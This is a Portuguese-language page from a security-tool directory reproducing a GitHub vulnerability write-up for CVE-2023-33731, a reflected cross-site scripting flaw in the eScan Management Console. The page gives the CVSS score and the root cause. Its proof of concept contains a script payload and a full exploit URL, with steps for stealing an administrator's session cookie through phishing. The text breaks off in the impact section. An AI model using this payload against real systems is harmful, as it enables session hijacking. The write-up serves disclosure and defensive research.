Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-33731 — Uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido foi descoberta no eScan Management Console (versão 14.0.1400.2281) desenvolvido pela Microworld Technologies. | Kitploit
Ferramentas/GitHubGitHub/sahiloj/cve-2023-33731
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubsahiloj/cve-2023-33731

CVE-2023-33731

Uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido foi descoberta no eScan Management Console (versão 14.0.1400.2281) desenvolvido pela Microworld Technologies.

Ver Repositório
113há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-33731 — Console de Gerenciamento eScan: Cross-Site Scripting (XSS) Refletido

CVE Severity Type Affected Version Vendor Status


Sumário

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Gravidade e Pontuação CVSS
  • Produto Afetado
  • Análise Técnica
  • Prova de Conceito
  • Impacto
  • Mitigação e Remediação
  • Linha do Tempo de Divulgação
  • Referências
  • Autor

Visão Geral

Uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido foi descoberta no Console de Gerenciamento eScan (versão 14.0.1400.2281) desenvolvido pela Microworld Technologies. A vulnerabilidade existe no endpoint Dashboard Details (DashBoardDetails), onde vários parâmetros de query string são refletidos na resposta HTML sem a devida sanitização ou codificação de saída. Um atacante remoto não autenticado pode criar uma URL maliciosa e enganar um administrador autenticado para que ele clique nela, fazendo com que JavaScript arbitrário seja executado na sessão do navegador da vítima.


Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2023-33731
Tipo de VulnerabilidadeCross-Site Scripting (XSS) Refletido
CWECWE-79 — Neutralização Incorreta de Entrada Durante a Geração de Página Web
Produto AfetadoConsole de Gerenciamento eScan da Microworld Technologies
Versão Afetada14.0.1400.2281
Endpoint Vulnerável/ewconsole/ewconsole.dll/DashBoardDetails
Parâmetros Vulneráveistype, subtype, result
Vetor de AtaqueRede (URL maliciosa entregue via phishing / engenharia social)
Autenticação NecessáriaA vítima deve estar autenticada; o atacante não precisa de credenciais
Testado EmWindows
Divulgado30 de maio de 2023
Homepage do Fornecedorhttps://www.escanav.com

Gravidade e Pontuação CVSS

MétricaValor
Pontuação Base6.1 (Médio)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária
EscopoAlterado
ConfidencialidadeBaixa
IntegridadeBaixa
DisponibilidadeNenhuma

Vetor CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Produto Afetado

  • Produto: Console de Gerenciamento eScan (plataforma de gerenciamento de segurança de endpoints baseada na web)
  • Fornecedor: Microworld Technologies
  • Versão: 14.0.1400.2281
  • Link do Software: https://cl.escanav.com/ewconsole.dll
  • Plataforma: Windows

Análise Técnica

O Console de Gerenciamento eScan expõe uma interface web (ewconsole.dll) que lida com várias operações de gerenciamento, incluindo visualizações de dashboard. O endpoint DashBoardDetails aceita vários parâmetros de query string (type, subtype, result, windowname, DisplayOSSelection) e usa seus valores para construir dinamicamente o conteúdo HTML na resposta do servidor.

Causa Raiz

O código no lado do servidor não consegue sanitizar ou codificar em HTML a entrada fornecida pelo usuário antes de incorporá-la ao corpo da resposta. Especificamente, o valor do parâmetro type é refletido diretamente em um contexto de atributo HTML sem escapar caracteres especiais como ", < e >. Isso permite que um atacante saia do contexto do atributo e injete tags HTML/JavaScript arbitrárias.

A mesma falha está presente nos parâmetros subtype e result.

Requisição Vulnerável

GET /ewconsole/ewconsole.dll/DashBoardDetails?type=<PAYLOAD>&subtype=<PAYLOAD>&result=<PAYLOAD>&windowname=usrmgmt&DisplayOSSelection=true
Host: cl.escanav.com

Detalhamento do Payload

O payload codificado em URL PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E é decodificado para:

PS"><script>alert(document.cookie)</script>
FragmentoFinalidade
PS"Fecha o valor do atributo HTML existente (" termina o atributo)
>Fecha a tag HTML circundante
<script>alert(document.cookie)</script>Injeta um bloco de script que executa JavaScript, aqui exfiltrando o cookie de sessão

Prova de Conceito

⚠️ Somente para fins educacionais e de pesquisa de segurança autorizada.

Pré-requisitos

  1. A vítima deve estar conectada ao Console de Gerenciamento eScan como um usuário autenticado (por exemplo, um administrador).
  2. O atacante entrega a seguinte URL maliciosa à vítima (por exemplo, via e-mail de phishing, mensagem de chat ou link incorporado).

Passos para Reproduzir

Passo 1: Faça login no Console de Gerenciamento eScan com credenciais válidas.

Passo 2: Navegue até (ou entregue a uma vítima autenticada) a seguinte URL maliciosa:

https://cl.escanav.com/ewconsole/ewconsole.dll/DashBoardDetails?type=PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&subtype=13&result=3&windowname=usrmgmt&DisplayOSSelection=true

Payload decodificado no parâmetro type:

PS"><script>alert(document.cookie)</script>

Passo 3: Ao carregar a página, o script injetado é executado no navegador. Uma caixa de diálogo de alerta aparece exibindo o cookie de sessão ativo da vítima.

Alerta de XSS com cookie de sessão

Passo 4: O atacante captura o valor do cookie de sessão e o utiliza para sequestrar a sessão do administrador, obtendo controle total do console de gerenciamento.

Cookie de sessão capturado


Impacto

A exploração bem-sucedida dessa vulnerabilidade permite que um atacante:

Baixar ferramenta